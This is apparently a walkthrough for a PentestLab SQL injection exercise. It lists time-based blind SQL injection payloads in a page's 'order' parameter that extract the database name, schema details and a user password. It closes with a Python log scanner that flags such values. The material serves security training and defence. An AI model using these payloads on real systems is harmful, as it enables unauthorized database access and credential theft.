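We open the target machine and select "SQL Injections".

Select "Example9".


[Image: PentestLab web security SQL injection, EXP9_php]


Observe the page.


[Image: PentestLab web security SQL injection, EXP9_sql_02]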

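The blind injection method is as follows:


The page returns no output, so time-based (delay) injection is used.

Injection point:

http://192.168.1.142/sqli/example9.php?order=if(length(database())>9,sleep(10),1)%23


The payloads are: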


http://192.168.1.142/sqli/example9.php?order=if(length(database())>9,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(ascii(substr(database(),1,1))>101,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>4,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>118,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(length((select column_name from information_schema.columns where table_name=unhex(7573657273) limit 1,1))>4,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(ascii(substr((select column_name from information_schema.columns where table_name=unhex(7573657273) limit 0,1),1,1))>105,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(length((select passwd from users limit 0,1))>5,sleep(10),1)%23


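Look at the target's source code.


[Image: PentestLab web security SQL injection, EXP9_ci_03]


The code uses a function to filter the SQL query.

You can refer to payloads available online.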
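As an added example (not part of the original post or the lab's code), the following Python sketch checks the `order` parameter in web access logs against an allow-list of sort columns and flags everything else, which is also the check the application should apply before building its ORDER BY clause. The column names in `ALLOWED_ORDER`, the log format and the sample log lines are assumptions constructed for illustration; the flagged values reuse payloads already shown above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: columns the page may legitimately sort by (not taken from the lab).
ALLOWED_ORDER = {"id", "name", "age"}
# Functions/keywords that have no place in a sort-column parameter.
SUSPICIOUS = re.compile(
    r"\b(sleep|benchmark|if|ascii|substr|length|unhex|select|information_schema)\b",
    re.IGNORECASE,
)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def check_order(value):
    """Return (ok, reasons) for one URL-decoded `order` value."""
    # Strip an optional sort direction before the allow-list comparison.
    column = re.sub(r"\s+(asc|desc)$", "", value.strip(), flags=re.IGNORECASE)
    if column.lower() in ALLOWED_ORDER:
        return True, []
    reasons = sorted({m.lower() for m in SUSPICIOUS.findall(value)})
    return False, reasons or ["not an allowed column"]

def scan(log_lines):
    """Return (line_no, order_value, reasons) for requests with a rejected `order`."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for value in parse_qs(query).get("order", []):
            ok, reasons = check_order(value)
            if not ok:
                findings.append((n, value, reasons))
    return findings

# Constructed access-log lines; the second and third reuse payloads from this page.
SAMPLE_LOG = [
    '192.168.1.50 - - [01/Jan/2024:10:00:00 +0000] "GET /sqli/example9.php?order=name HTTP/1.1" 200 512',
    '192.168.1.50 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli/example9.php?order=if(length(database())>9,sleep(10),1)%23 HTTP/1.1" 200 512',
    '192.168.1.50 - - [01/Jan/2024:10:00:20 +0000] "GET /sqli/example9.php?order=if(length((select%20passwd%20from%20users%20limit%200,1))>5,sleep(10),1)%23 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

None of the payloads above contains a quote character, so a quote-escaping filter leaves them unchanged; comparing the value against a fixed set of column names rejects them regardless of their content.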